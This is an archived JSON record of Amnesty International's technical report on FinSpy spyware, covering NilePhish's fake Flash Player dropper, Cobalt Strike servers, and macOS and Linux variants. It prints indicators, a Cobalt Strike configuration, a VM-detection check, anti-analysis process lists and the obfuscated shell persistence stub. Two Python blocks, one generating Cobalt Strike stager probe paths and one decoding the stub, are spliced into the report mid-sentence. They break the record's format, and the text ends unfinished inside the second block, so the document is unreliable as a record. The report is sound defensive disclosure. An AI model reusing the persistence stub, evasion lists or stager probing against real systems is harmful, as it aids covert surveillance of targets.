{
	"id": "c085501f-0637-45cf-8f67-40a9fa4bad63",
	"created_at": "2026-04-06T00:20:07.536841Z",
	"updated_at": "2026-04-10T13:11:28.398215Z",
	"deleted_at": null,
	"sha1_hash": "08f28a1c3c042b3806e0e32fe993bdc915da55b9",
	"title": "German-made FinSpy spyware found in Egypt, and Mac and Linux versions revealed",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 514370,
	"plain_text": "German-made FinSpy spyware found in Egypt, and Mac and Linux\r\nversions revealed\r\nPublished: 2020-09-25 · Archived: 2026-04-05 13:13:12 UTC\r\nSummary:\r\nFinSpy is a commercial spyware suite produced by the Munich-based company FinFisher Gmbh. Since 2011\r\nresearchers have documented numerous cases of targeting of Human Rights Defenders (HRDs) – including activists,\r\njournalists, and dissidents with the use of FinSpy in many countries, including Bahrain, Ethiopia, UAE, and more.\r\nBecause of this, Amnesty International’s Security Lab tracks FinSpy usage and development as part of our\r\ncontinuous monitoring of digital threats to Human Rights Defenders.\r\nAmnesty International published a report in March 2019 describing phishing attacks targeting Egyptian human rights\r\ndefenders and media and civil society organizations staff carried out by an attacker group known as “NilePhish”.\r\nWhile continuing research into this group’s activity, we discovered it has distributed samples of FinSpy for Microsoft\r\nWindows through a fake Adobe Flash Player download website. 
Amnesty International has not documented human\r\nrights violations by NilePhish directly linked to FinFisher products.\r\nThrough additional technical investigations into this most recent variant, Amnesty’s Security Lab also discovered,\r\nexposed online by an unknown actor, new samples of FinSpy for Windows and Android, and previously undisclosed\r\nversions for Linux and MacOS computers.\r\nThis report provides technical information on these recent FinSpy samples in order to aid the cybersecurity research\r\ncommunity in further investigations, enable cybersecurity vendors to implement protection mechanisms against these\r\nnewly discovered variants, and raise awareness among HRDs of evolving digital attack techniques.\r\nIntroduction\r\nFinSpy is a full-fledged surveillance software suite, capable of intercepting communications, accessing private data, and\r\nrecording audio and video from the computer or mobile devices it is silently installed on. FinSpy is produced by the Munich-based company FinFisher GmbH and sold to law enforcement and government agencies around the world. According to\r\nmedia reports, when Egyptian protesters broke into the offices of the now dissolved State Security Investigations Service, an\r\nintelligence body responsible for invest igating security threats and notorious for committing grave human rights violations\r\nduring Hosni Mubarak’s decades-long rule, in 2011, they discovered contracts for the sale of FinSpy to Egyptian authorities.\r\nSince then, research groups such as Citizen Lab, at the University of Toronto, and Privacy International have discovered\r\nFinSpy being used to target HRDs and civil society in many countries, including Bahrain, Turkey and Ethiopia. 
Because of\r\nthis, Amnesty International’s Security Lab tracks FinSpy usage and development as part of our continuous monitoring of\r\ndigital threats to HRDs.\r\nIn September 2019, Amnesty International discovered samples of FinFisher’s spyware distributed by malicious\r\ninfrastructure tied to the attacker group commonly known as NilePhish, which is likely to be state-sponsored. These attacks took\r\nplace amid an unprecedented crackdown on independent civil society and any critical voices. Over the years, numerous\r\nresearch reports, including by Amnesty International, have detailed NilePhish’s campaigns targeting Egyptian civil society\r\norganizations. Further technical investigation by Amnesty’s Security Lab led to the discovery of additional, previously\r\nunknown samples for Linux and Mac OS computers, provided with extensive interception capabilities.\r\nWith this report, Amnesty’s Security Lab shares new insights into the capabilities of the NilePhish attacker group and\r\nprovides a detailed analysis of newly discovered variants of FinSpy, in order to enable cybersecurity researchers to further\r\ninvestigate and develop protection mechanisms. In addition, we hope to raise awareness among HRDs of the evolution of\r\ndigital attack techniques and help address the common misconception that Linux and Mac computers are safe from spyware\r\nattacks.\r\nNilePhish fake Flash Player update delivers FinFisher’s FinSpy\r\nIn March 2019 Amnesty International’s Security Lab warned Egyptian civil society organizations of a widespread campaign\r\nof phishing attacks targeting human rights defenders, conducted by the so-called NilePhish attacker group. 
Following the\r\npublication, we continued monitoring the malicious infrastructure operated by this group to identify any new attack\r\ncampaigns.\r\nBy monitoring the group’s tools, techniques and attack infrastructure, in September 2019 Amnesty’s Security Lab identified\r\nthe malicious website flash.browserupdate[.]download, connected to NilePhish. The website pretended to be a warning from\r\nAdobe Flash Player recommending the installation of an update. Clicking anywhere on the page would download a recent version of\r\nFlash Player backdoored with FinSpy.\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 1 of 17\n\nflash.browserupdate[.]download as displayed in September 2019\r\nWhen we analyzed this Flash Player installer, we found it to be a FinSpy dropper (with hash\r\nf960144126748b971386731d35e41288336ad72a9da0c6b942287f397d57c600), designed to retrieve the final payload from\r\nthe server https://172.241.27[.]171/support/personal.asp. This payload would then be loaded into memory and executed.\r\nThe server was offline at the time of analysis and we therefore did not manage to retrieve any additional payload.\r\nThe version of Flash Player (32.0.0.269) used to bundle the FinSpy downloader was released by Adobe in September 2019.\r\nThe file had a creation date of 20th September 2019. This suggests that the backdoored binary was newly created around the\r\ntime in September 2019 when it was first uploaded to browserupdate[.]download.\r\nIt is worth noting that in 2017, ESET, a Slovak internet security company, reported that FinFisher spyware was being\r\ndelivered using network injection attacks in two (unnamed) countries. The research group Citizen Lab, located at the\r\nUniversity of Toronto, later discovered evidence of equipment used for similar network injection attacks in Egypt,\r\nsuggesting it might also have been used for the distribution of FinFisher’s FinSpy. 
We cannot exclude that targets of this\r\ncampaign were redirected to the browserupdate[.]download page through network injection, as similar backdoored software\r\nhas been used in network injection attacks in the past.\r\nConnections with NilePhish\r\nThe operators of this fake Flash Player download page created several other droppers which would download payloads from\r\nbrowserupdate[.]com. These included malicious Word documents containing macros, and a .NET program named\r\nclean.downloader.exe (with hash 14658327efaa15275fb8718956ee97ebcad5bc80312a4f3182a3b10cd3dcf257), uploaded to\r\nthe malware scanning service VirusTotal on 8th October 2019. These additional droppers appeared to be under development\r\nand used for testing purposes: each downloaded a legitimate version of the tool PuTTY from\r\nhttps://flash.browserupdate[.]download/putty.exe.\r\nRevealingly, the .NET dropper included a PDB debug path from the developer’s computer:\r\nC:\\Users\\shenno\\source\\repos\\clean.downloader\\clean.downloader\\obj\\Release\\clean.downloader.pdb.\r\nThe username on the computer where this dropper was developed is “shenno”. We had previously found this name used by\r\nthe attackers behind the NilePhish campaign we detailed in our March 2019 report. The Security Lab continued to monitor this\r\ngroup’s campaigns following our publication.\r\nIn February 2020, approximately 6 months after the initial FinSpy discovery, a new subdomain\r\n“files.browserupdate[.]download” was created which acted as a reverse proxy to a Cobalt Strike server hosted at\r\n185.125.230[.]203 (more on this later). 
This IP is registered to a small Russian hosting company named Offshore Servers.\r\nSince 2018 we have observed NilePhish hosting a large part of their phishing infrastructure with Offshore Servers.\r\nLink between the FinSpy sample and NilePhish\r\nIn October 2019, the cybersecurity firm Check Point released a follow-up report based on Amnesty International’s research\r\nwhich independently confirmed links between NilePhish, the Offshore Servers infrastructure and the operator named\r\n“shenno”. Check Point identified an Egyptian individual whom they linked to NilePhish and the “shenno” username, and first\r\nrevealed it to the public. At the time of our discovery of the fake Flash Player FinSpy dropper, “shenno” had not been\r\ndisclosed yet.\r\nThe combination of nickname reuse, the use of the same hosting provider Offshore Servers, and the registration of additional\r\nNilePhish domains with the same registrar in September 2019 ties this activity to NilePhish. These additional NilePhish\r\ndomains include loglive.co (registered September 11th), webmaillive.co (registered September 15th), and onlineaccount.live\r\n(registered October 2nd, 2019). Amnesty International has not confirmed how NilePhish obtained the FinSpy software.\r\nNilePhish testing Cobalt Strike\r\nIn February 2020, a new subdomain files.browserupdate[.]download was created, pointing to a server at 5.135.174[.]213\r\nhosted by the French hosting company OVH. This server ran an HTTP server with a valid TLS certificate on port\r\n443. Using Censys we found that the server hosted on Offshore Servers at 185.125.230[.]203 was also running a web server\r\nwith the same TLS certificate. 
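The stager URI test applied to this server in the next paragraph relies on the checksum8 scheme shared by Metasploit and Cobalt Strike: the byte values of the request path are summed modulo 256, and a result of 92 marks an x86 stager request while Cobalt Strike serves its x64 stager for 93. The Python below is an added example, not code from Amnesty's report or its repository. It follows Metasploit's handling of the resource, which drops the query string and ignores characters outside the base64url alphabet (the leading slash included) before summing; it classifies request paths from constructed web-server log lines and builds a probe path for a given checksum, the way a scanner does before asking a suspected team server for a stager. The log lines and the four-character path length are choices made for the example.

```python
import itertools
import re
import string

# Published stager URI checksums: Metasploit and Cobalt Strike x86 stagers
# answer on paths whose checksum8 is 92; Cobalt Strike uses 93 for x64.
STAGER_CHECKSUMS = {92: 'x86', 93: 'x64'}


def checksum8(text):
    # Sum of the byte values of the string, reduced modulo 256.
    return sum(text.encode('utf-8')) % 256


def stager_uri_checksum(path):
    # Mirrors Metasploit's resource handling: the query string is dropped and
    # every character outside the base64url alphabet (so the leading slash
    # too) is ignored before the sum is taken.
    resource = path.split('?', 1)[0]
    stripped = re.sub('[^A-Za-z0-9_-]', '', resource)
    return checksum8(stripped)


def classify_path(path):
    # Returns 'x86', 'x64' or None for a request path.
    return STAGER_CHECKSUMS.get(stager_uri_checksum(path))


def generate_probe_path(target, length=4):
    # Deterministically builds a path of the given length whose checksum is
    # the target, by walking an alphanumeric alphabet in order. A scanner
    # requests such a path to see whether a suspected team server hands out
    # a stager for it.
    alphabet = string.ascii_letters + string.digits
    for chars in itertools.product(alphabet, repeat=length - 1):
        candidate = '/' + ''.join(chars)
        if stager_uri_checksum(candidate) == target:
            return candidate
    return None


def scan_log(lines):
    # Walks log lines of the form 'METHOD PATH PROTOCOL' and reports the
    # paths that look like stager fetches, with the architecture implied.
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        arch = classify_path(parts[1])
        if arch is not None:
            hits.append((parts[1], arch))
    return hits


# Constructed sample log lines, not taken from the report.
SAMPLE_LOG = [
    'GET /aaa9 HTTP/1.1',
    'GET /aab9 HTTP/1.1',
    'GET /index.html HTTP/1.1',
    'GET /aab9?x=1 HTTP/1.1',
]

if __name__ == '__main__':
    for path, arch in scan_log(SAMPLE_LOG):
        print(path, arch)
    print(generate_probe_path(93))
```

A checksum match on its own is weak evidence, since one request path in 256 satisfies it by chance; it becomes meaningful when the response to such a probe is a stager, which is the confirmation step the report describes.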
Timing measurements showed that the OVH server was a reverse proxy for 185.125.230[.]203.\r\nProbing any URL whose path matched the URI checksum algorithm used by Cobalt Strike and Metasploit stagers did indeed return\r\nCobalt Strike payloads.\r\nCobalt Strike is a commercial penetration testing suite that is sold for legitimate security audits of organizations. Since\r\n2016, Cobalt Strike has been identified as being abused by many attack groups, such as the cyber-criminal Cobalt Group and\r\nstate-sponsored groups targeting governments and individuals in Hong Kong and India. Cobalt Strike samples have been\r\nextensively analysed in public by several cybersecurity companies.\r\nAn obfuscated VBS script located at https://files.browserupdate[.]download/a downloads a Cobalt Strike payload from the\r\nsame server on port 443 and launches it.\r\nHere is the extracted configuration of the Cobalt Strike sample:\r\ndns : False\r\nssl : True\r\nport : 443\r\n.sleeptime : 5000\r\n.http-get.server.output :\r\n.jitter : 0\r\n.maxdns : 255\r\npublickey :\r\n30819f300d06092a864886f70d010101050003818d0030818902818100f2b83af090d1a0c0a59e62ede880813384eccb6bff849d03d201a92f653a0747aa832a\r\n.http-get.uri : files.browserupdate.download,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books\r\n.user-agent : Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n.http-post.uri : /N4215/adj/amzn.us.sr.aps\r\n.http-get.client : Accept: /\r\nHost: www.amazon.comsession-token=\r\n                                  skin=noskin;,csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996Cookie\r\n.http-post.client :  Accept: /\r\nContent-Type: text/xml\r\nX-Requested-With: XMLHttpRequest\r\nHost: www.amazon.com\r\nsz=160x600    oe=oe=ISO-8859-1;sn    s=3717    \"dc_ref=http%3A%2F%2Fwww.amazon.com\r\n.spawnto : 
fbf34aa48d6080bf8ef3eaff8ecf9a31\r\n.post-ex.spawnto_x86 : %windir%\\syswow64\\rundll32.exe\r\n.post-ex.spawnto_x64 : %windir%\\sysnative\\rundll32.exe\r\nunknown :\r\ncryptoscheme : 0\r\n.dns_idle : 0\r\n.dns_sleep : 0\r\n.http-get.verb : GET\r\n.http-post.verb : POST\r\nshouldChunkPosts : 0\r\nwatermark : 1\r\n.stage.cleanup : 0\r\nCFGCaution : 0\r\nWe provide signatures to detect Cobalt Strike, and scripts to decode the payload and extract its configuration, in our GitHub\r\nrepository.\r\nFinSpy for Linux and Mac OS discovered\r\nIn the fall of 2019, while investigating recent versions of FinSpy following the discovery of its use by NilePhish, we\r\nidentified, through the malware research platform VirusTotal, additional FinSpy samples hosted on a server at the IP\r\naddress 158.69.105[.]207. We believe this server has no relation to NilePhish and belongs to a different FinSpy operator.\r\nScreenshot of the server webpage in October 2019\r\nThis server hosted several samples linked from a publicly exposed webpage:\r\n“Jabuka.app”: FinSpy for Mac OS, publicly disclosed here for the first time.\r\n“PDF”: FinSpy for Linux, publicly disclosed here for the first time.\r\n“wrar571.exe”: FinSpy downloader for Windows.\r\n“WIFI.apk”: FinSpy for Android.\r\nAll these FinSpy samples were generated between April 2019 and November 2019.\r\nFinSpy for Mac OS\r\nThe application bundle “Jabuka.app” is a copy of FinSpy for Mac OS, and it contains the following files:\r\nJabuka.app/Contents/Resources/data (with hash\r\n37e749b79f4a24ead2868dffdb22c5034053615fed1166fdea05b4ca43b65c83) is an encrypted payload. 
\r\nJabuka.app/Contents/Info.plist (with hash\r\nb5304d70dfe832c5a830762f8abc5bc9c4c6431f8ecfe80a6ae37b9d4cb430fd) is a PList used for persistence.\r\nJabuka.app/Contents/MacOS/installer (with hash\r\n80d6e71c54fb3d4a904637e4d56e108a8255036cbb4760493b142889e47b951f) is the launcher.\r\nInfection Chain\r\nThe FinSpy sample for MacOS uses a quite complex chain to infect the system, and the developers took measures to\r\ncomplicate its analysis. All the binaries are obfuscated with the open-source Obfuscator-LLVM, developed by a research team\r\nin 2013.\r\nThe first stage checks whether the spyware is running in a virtual machine:\r\n\u003e system_profiler SPUSBDataType | egrep -i \"Manufacturer: (parallels|vmware|virtualbox)\"\r\nIf it is not, it then decrypts, by XOR’ing with the string “NSString”, a Zip archive at the path /tmp/arch.zip and unpacks it to\r\n/tmp/org.logind.ctp.archive. This archive contains the installer and the main payload, but also binaries for privilege escalation:\r\nhelper: exploits a bug in Mac OS X fixed in 2013 or 2014.\r\nhelper2: Python exploit for CVE-2015-5889.\r\nThis first stage uses the exploits to get root access. If none of them work, it asks the user to grant root permissions to\r\nlaunch the next stage installer.\r\nThe installer (/tmp/org.logind.ctp.archive/installer) installs the spyware on the system by:\r\n1. Copying all the plugins and configuration files to /Library/Frameworks/Storage.framework.\r\n2. Copying the launcher to /private/etc/logind.\r\n3. Installing persistence by creating a logind.plist file in /System/Library/LaunchAgents/ (T1543.001).\r\nA modular framework\r\nFinSpy for Mac OS, and similarly its Linux counterpart, follow a modular design. 
The launcher logind only instantiates the\r\ncore component dataPkg, which handles communications with the Command and Control server (C\u0026C) and\r\ndecrypts and launches modules when needed. The modules are encrypted with the AES algorithm and compressed with the\r\naplib compression library. The AES key is stored in the binary, but the IV is stored in each configuration file along with an\r\nMD5 hash of the final decompressed file.\r\nHere is the list of modules available in this version of the spyware, although additional references in the code suggest that\r\nadditional modules might exist but were not available in this distribution:\r\nFile name   Module name    Description\r\n02          FSMain         List files.\r\n04          CL             Executes shell commands.\r\n05          Sch            Scheduling.\r\n10          A              Audio recording.\r\n12          IO             Keylogger.\r\n16          FSCF           Recording of modified files using the File System Events API.\r\n17          FSAF           Recording of accessed files.\r\n19          FSDF           Recording of deleted files.\r\n22          MCMain         Keylogger for virtual keyboards.\r\n23          CW, LSC, RSC   Camera recording.\r\n24          SM             Screen recording.\r\n28          W              Collect information about Wi-Fi networks.\r\n29          RM             List files on remote devices.\r\n7f                         Handles cryptography for C\u0026C communications.\r\nCommand \u0026 Control Communications\r\nThe spyware communicates with the Command \u0026 Control (C\u0026C) server using HTTP POST requests. 
The data sent to the\r\nserver is encrypted using functions provided by the 7F module, compressed using a custom compressor and base64-encoded.\r\nAll requests are made with a Content-Type chosen randomly from the following list:\r\napplication/pdf\r\napplication/zip\r\napplication/gzip\r\nimage/gif\r\nimage/jpeg\r\nimage/png\r\nimage/tiff\r\ntext/html\r\ntext/plain\r\nConfiguration\r\nEach module is provided with its own configuration file. These files are encoded using a Type-Length-Value (TLV) format with the\r\nfields in a different order (Size, Type, Value). The type serves both as an identifier and as a field type, the lowest nibble representing the\r\ntype of data. Most types identified fit the TLVs listed in the FinSpy Android analysis published by the Chaos Computer Club\r\nin 2019.\r\nHere is the extracted configuration of the core module:\r\n{\r\n  \"TlvTypeTrojanID\": \"Jabuka\",\r\n  \"0x80ab40\": 0,\r\n  \"0x80aa40\": 0,\r\n  \"TlvTypeEncryption\": \"GZP\u0026OYq0S[AJ\\D\\u000e\\*^\\\"L@}C\",\r\n  \"TlvTypeConfigTargetID\": \"Jabuka\",\r\n  \"TlvTypeConfigAutoRemovalIfNoProxy\": 168,\r\n  \"TlvTypeBlackWhiteListingMode\": 0,\r\n  \"TlvTypeTrojanMaxInfections\": 9,\r\n  \"TlvTypeTargetUID\": 0,\r\n  \"TlvTypeBlackListEntry\": [\r\n    {\r\n      \"category\": \"Monitoring\",\r\n      \"list\": [\r\n        \"taskmgr\",\r\n        \"Windows Task Manager\",\r\n        \"AccessEnum\",\r\n        \"AccessEnum\",\r\n        \"ADExplorer\",\r\n        \"Active Directory Explorer\",\r\n        \"ADInsight\",\r\n        \"Insight for Active Directory\",\r\n        \"Autologon\",\r\n        \"Autologon\",\r\n        \"autoruns\",\r\n        \"Autoruns\",\r\n        \"Bginfo\",\r\n        \"BGInfo\",\r\n        \"Cacheset\",\r\n        \"Cacheset\",\r\n        \"Dbgview\",\r\n        \"Debug View\",\r\n        \"Desktops\",\r\n        \"Desktops\",\r\n        \"disk2vhd\",\r\n        \"Disk2vhd\",\r\n        \"Diskmon\",\r\n    
    \"Disk Monitor\",\r\n        \"DiskView\",\r\n        \"LoadOrd\",\r\n        \"LoadOrder\",\r\n        \"pagedfrg\",\r\n        \"System File Defragmenter\",\r\n        \"procexp\",\r\n        \"Process Explorer\",\r\n        \"Procmon\",\r\n        \"Process Monitor\",\r\n        \"RootkitRevealer\",\r\n        \"ShareEnum\",\r\n        \"ShellRunas\",\r\n        \"Tcpview\",\r\n        \"TCPView\",\r\n        \"vmmap\",\r\n        \"VMMap\",\r\n        \"Winobj\",\r\n        \"ZoomIt\"\r\n      ]\r\n    },\r\n    {\r\n      \"category\": \"Sniffer\",\r\n      \"list\": [\r\n        \"wireshark\",\r\n        \"The Wireshark Network Analyzer\",\r\n        \"TCPDump\",\r\n        \"Tcpview\",\r\n        \"NetstatViewer\",\r\n        \"Netstat Viewer\",\r\n        \"NetPryer\",\r\n        \"Ultra Network Sniffer\"\r\n      ]\r\n    },\r\n    {\r\n      \"category\": \"Debugger\",\r\n      \"list\": [\r\n        \"OllyDbg\",\r\n        \"idag\",\r\n        \"The interactive disassembler\",\r\n        \"WinDbg\"\r\n      ]\r\n    }\r\n  ],\r\n  \"TlvTypeWhiteListEntry\": [\r\n    {\r\n      \"category\": \"Browser\",\r\n      \"list\": [\r\n        \"firefox\",\r\n        \"Mozilla Firefox\",\r\n        \"iexplore\",\r\n        \"Windows Internet Explorer\",\r\n        \"opera\",\r\n        \"chrome\"\r\n      ]\r\n    },\r\n    {\r\n      \"category\": \"Messenger\",\r\n      \"list\": [\r\n        \"icq\",\r\n        \"ICQ\",\r\n        \"aim6\",\r\n        \"AIM\",\r\n        \"Skype\",\r\n        \"Ypager\",\r\n        \"Yahoo Messenger\",\r\n        \"pidgin\",\r\n        \"Buddy List\",\r\n        \"trillian\",\r\n        \"Trillian\",\r\n        \"googletalk\",\r\n        \"google Talk\"\r\n      ]\r\n    },\r\n    {\r\n      \"category\": \"E – Mail\",\r\n      \"list\": [\r\n        \"OUTLOOK\",\r\n        \"Microsoft Outlook\",\r\n        \"msimn\",\r\n        \"Outlook Express\",\r\n        \"thunderbird\",\r\n        \"Mozilla Thunderbird\",\r\n        
\"WinMail\",\r\n        \"Windows Mail\",\r\n        \"thebat\",\r\n        \"The Bat!\"\r\n      ]\r\n    },\r\n    {\r\n      \"category\": \"FileSharing\",\r\n      \"list\": [\r\n        \"bittorrent\",\r\n        \"Bit Torrent\",\r\n        \"uTorrent\",\r\n        \"µTorrent\",\r\n        \"emule\",\r\n        \"eMule\",\r\n        \"edonkey2000\",\r\n        \"eDonkey\",\r\n        \"kazaa\",\r\n        \"Kazaa\",\r\n        \"FrostWire\",\r\n        \"LimeWire\"\r\n      ]\r\n    },\r\n    {\r\n      \"category\": \"VoIP\",\r\n      \"list\": [\r\n        \"CGStarter\",\r\n        \"X-Lite\",\r\n        \"Gizmo5\",\r\n        \"Mercuro\",\r\n        \"Mercuro IMS Client\",\r\n        \"ts3client_win32\",\r\n        \"TeamSpeak 3\",\r\n        \"Zfone\",\r\n        \"Zfone Control Panel\"\r\n      ]\r\n    }\r\n  ],\r\n  \"TlvTypeConfigTargetPort\": 443,\r\n  \"TlvTypeRequestID\": 0,\r\n  \"0x804140\": 2048,\r\n  \"TlvTypeVersion\": 0,\r\n  \"TlvTypeUserID\": 1000,\r\n  \"TlvTypeConfigAutoRemovalDateTime\": \"0000000000000000\",\r\n  \"TlvTypeTrojanUID\": 232069579,\r\n  \"TlvTypeConfigTargetProxy\": [\r\n    \"185.25.50.[REDACTED]\",\r\n    \"103.11.67.[REDACTED]\"\r\n  ],\r\n  \"TlvTypeConfigFileTransferSpeed\": 1024,\r\n  \"0x807c30\": 0,\r\n  \"TlvTypeConfigTargetHeartbeatInterval\": 60000,\r\n  \"TlvTypeConfigActiveHiding\": 0\r\n}\r\nYou can find code to extract the configuration from FinSpy samples in our GitHub repository.\r\nTimeline\r\nThe PList file contains metadata indicating that development could have started on OS X\r\n10.9, which was released in October 2013. But the spyware was very likely packaged for use in November 2019, as most of\r\nthe files in the Zip archive were last modified in November 2019. Here is an extract of the archive information:\r\nDate Time Attr Size Compressed Name\r\n2019-11-20 12:48:29 D.... 
0 0 org.logind.ctp.archive\r\n2019-11-20 12:48:29 ....A 30196 10420 org.logind.ctp.archive/helper\r\n2019-11-20 12:48:29 ....A 975 540 org.logind.ctp.archive/helper2\r\n2019-11-20 12:48:29 ....A 63164 21452 org.logind.ctp.archive/installer\r\n2019-11-20 12:48:29 ....A 34264 12137 org.logind.ctp.archive/logind\r\n2019-11-20 12:48:29 ....A 431 267 org.logind.ctp.archive/logind.plist\r\n2019-11-20 12:48:29 D.... 0 0 org.logind.ctp.archive/storage.framework\r\n2019-11-20 12:48:29 D.... 0 0 org.logind.ctp.archive/storage.framework/Contents\r\n2019-04-25 15:35:02 ....A 1286 477 org.logind.ctp.archive/storage.framework/Contents/Info.plist\r\n2019-04-25 15:35:02 ....A 8 8 org.logind.ctp.archive/storage.framework/Contents/PkgInfo\r\n2019-11-20 12:48:29 D.... 0 0 org.logind.ctp.archive/storage.framework/Contents/MacOS\r\n...\r\nRelated sample\r\nAn additional FinSpy Mac OS sample named “caglayan-macos.dmg” was found on VirusTotal:\r\n4f3003dd2ed8dcb68133f95c14e28b168bd0f52e5ae9842f528d3f7866495cea. This sample was created in February 2018\r\naccording to the zip file’s timestamps.\r\nFinSpy for Linux\r\nThe Linux version of FinSpy was exposed on the server 158.69.105[.]207 in November 2019 as a file named “PDF” with hash\r\n1e9162cd0941557304a6a097dfaadf59f90bc8bbaa9879afe67b5ce0d1514be8. The Linux payload is very similar to the Mac\r\nOS version described above, which suggests a shared codebase. However, the launchers and the infection chain are\r\nadapted to work on Linux systems.\r\nInfection Chain\r\nThe “PDF” file obtained from the server is a short script containing encoded binaries for 32-bit and 64-bit Linux. It extracts\r\nthe binary for the relevant architecture to /tmp/udev2 and executes it. 
Like its Mac OS counterpart, FinSpy for Linux is also\r\nobfuscated using Obfuscator-LLVM.\r\nThe udev2 installer then checks that the system is not a virtual machine, extracts files from itself and stores them in a hidden\r\nfolder in the user’s home, such as ~/.cache/.cfg or ~/.local/.apps. Among the extracted files are a first-stage payload called\r\ncrond and encrypted modules named with a hexadecimal number (such as 02), each with its configuration in a .dat file,\r\nsuch as 02C.dat. In order to maintain persistence, an obfuscated script is added to the following files:\r\n~/.profile\r\n~/.profile1\r\n~/.bash_profile\r\n~/.bash_profile1\r\n~/.kde/Autostart/udev2.sh\r\n~/.kde4/Autostart/udev2.sh\r\n~/.kde/Autostart\r\n~/.kde4/Autostart\r\nThe script is disguised as dealing with system fonts, but it executes FinSpy’s first stage:\r\nif [ ! -n \"$CS_FONT\" ]; then\r\n  # Load fonts by id\r\n  CS_FONT_RID=\"2F686F6D652F757365722F2E63616368652F2E636667\"\r\n  CS_FONT_ID=\"2E2F63726F6E64\"\r\n  CS_FONT_COL=\"6364\"\r\n  CS_FONT_COLF=`echo ${CS_FONT_COL} |sed 's/../\u0026 /g' |sed 's/ / p /g' |awk '{print \"16i \"$0}'|dc 2\u003e/dev/null|awk '{printf(\"%c\",$0)}'`\r\n  CS_FONT_SID=`echo ${CS_FONT_RID} |sed 's/../\u0026 /g' |sed 's/ / p /g' |awk '{print \"16i \"$0}'|dc 2\u003e/dev/null|awk '{printf(\"%c\",$0)}'`\r\n  CS_FONT_LOAD=`echo ${CS_FONT_ID} |sed 's/../\u0026 /g' |sed 's/ / p /g' |awk '{print \"16i \"$0}'|dc 2\u003e/dev/null|awk '{printf(\"%c\",$0)}'`\r\n  if [ ! 
-n \"$CS_FONT_COLF\" ]; then\r\n     CS_FONT_COLF=$(for i in `echo ${CS_FONT_COL} |sed 's/../\u0026 /g'` ; do echo \"000000 $i\" | xxd -r; done)\r\n     CS_FONT_SID=$(for i in `echo ${CS_FONT_RID} |sed 's/../\u0026 /g'` ; do echo \"000000 $i\" | xxd -r; done)\r\n     CS_FONT_LOAD=$(for i in `echo ${CS_FONT_ID} |sed 's/../\u0026 /g'` ; do echo \"000000 $i\" | xxd -r; done)\r\n  fi\r\n  ${CS_FONT_COLF} ${CS_FONT_SID} \u0026\u0026 ${CS_FONT_LOAD} \u003e /dev/null 2\u003e\u00261 \u0026\u0026 ${CS_FONT_COLF} - \u003e /dev/null 2\u003e\u00261\r\n    unset CS_FONT_ID\r\n    unset CS_FONT_COLF\r\n    unset CS_FONT_SID\r\n    unset CS_FONT_LOAD\r\nfi\r\nBy decoding the embedded hexadecimal values, the script builds the following command and executes the\r\nFinSpy launcher:\r\ncd /home/user/.cache/.cfg \u0026\u0026 ./crond \u003e /dev/null 2\u003e\u00261 \u0026\u0026 cd - \u003e /dev/null 2\u003e\u00261\r\nThe installer finally launches the crond first-stage binary copied to the installation folder. This crond binary performs only a\r\nfew checks (a mutex file at /tmp/.X11.lock, and a ptrace-based check for an attached debugger), then decrypts and decodes the core\r\nmodule 80.so and runs it in memory.\r\nModules\r\nThe modules available in the Linux sample are almost identical to those of the MacOS sample. The binaries are also stored encrypted and\r\nobfuscated, in a slightly different format: the AES initialization vector is stored within the core module binary\r\ninstead of in the encrypted module files.\r\nThe modules available are exactly the modules of the MacOS sample, with the addition of module 14, which\r\nextracts data and records conversations from Skype.\r\nConfiguration\r\nThe configuration of the different modules is stored in .dat files with the same encoding scheme as the MacOS sample. 
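The persistence stub shown above hides its working directory, launcher name and the cd command as hex strings in CS_FONT_* variables and rebuilds them at every login through sed, awk and dc (or xxd when dc is missing). The Python below is an added example, not code from the report: it reimplements that decoding, scans a profile file for the variable block and reconstructs the command the stub would run, which is what a responder checking ~/.profile, ~/.bash_profile or the KDE Autostart entries listed above wants to see. The profile content it scans is a constructed sample carrying the three hex strings from the script above; the real stub also contains the decoding lines themselves, which the scanner ignores, and it quotes the values with double quotes, which the pattern accepts as well.

```python
import re

# Assignments of the form CS_FONT_NAME="hexdigits" (any single quote
# character is tolerated between = and the digits). The decoding lines of
# the stub (CS_FONT_COLF=`echo ...`) never match, because what follows the
# optional quote there is not a run of hex digits.
HEX_ASSIGNMENT = re.compile(r'CS_FONT_([A-Z]+)=.?([0-9A-Fa-f]{4,})')


def decode_dc_hex(hexstr):
    # Equivalent of the stub's pipeline
    #   sed 's/../& /g' | sed 's/ / p /g' | awk '{print "16i "$0}' | dc | awk '{printf("%c",$0)}'
    # which prints one byte per pair of hex digits.
    return bytes.fromhex(hexstr).decode('latin-1')


def extract_font_vars(script_text):
    # Collects the hex-encoded CS_FONT_* variables with their decoded values;
    # a value with an odd digit count cannot be a byte string and is skipped.
    found = {}
    for name, value in HEX_ASSIGNMENT.findall(script_text):
        if len(value) % 2 == 0:
            found[name] = decode_dc_hex(value)
    return found


def rebuild_command(font_vars):
    # Mirrors the stub's final line,
    #   ${CS_FONT_COLF} ${CS_FONT_SID} && ${CS_FONT_LOAD} > /dev/null 2>&1 && ${CS_FONT_COLF} - > /dev/null 2>&1
    # where COLF, SID and LOAD are the decoded COL, RID and ID values.
    try:
        colf, sid, load = font_vars['COL'], font_vars['RID'], font_vars['ID']
    except KeyError:
        return None
    return (colf + ' ' + sid + ' && ' + load + ' > /dev/null 2>&1 && '
            + colf + ' - > /dev/null 2>&1')


def scan_profile(text):
    # Returns the decoded variables and the reconstructed launch command when
    # the file carries the stub, otherwise None.
    if 'CS_FONT' not in text:
        return None
    font_vars = extract_font_vars(text)
    command = rebuild_command(font_vars)
    if command is None:
        return None
    return {'vars': font_vars, 'command': command}


# Constructed sample profile, not a capture from an infected machine. The
# hex strings are the ones carried by the script above.
SAMPLE_PROFILE = '''# ~/.profile (constructed sample)
export PATH=$HOME/bin:$PATH
if [ ! -n '$CS_FONT' ]; then
  # Load fonts by id
  CS_FONT_RID='2F686F6D652F757365722F2E63616368652F2E636667'
  CS_FONT_ID='2E2F63726F6E64'
  CS_FONT_COL='6364'
fi
'''

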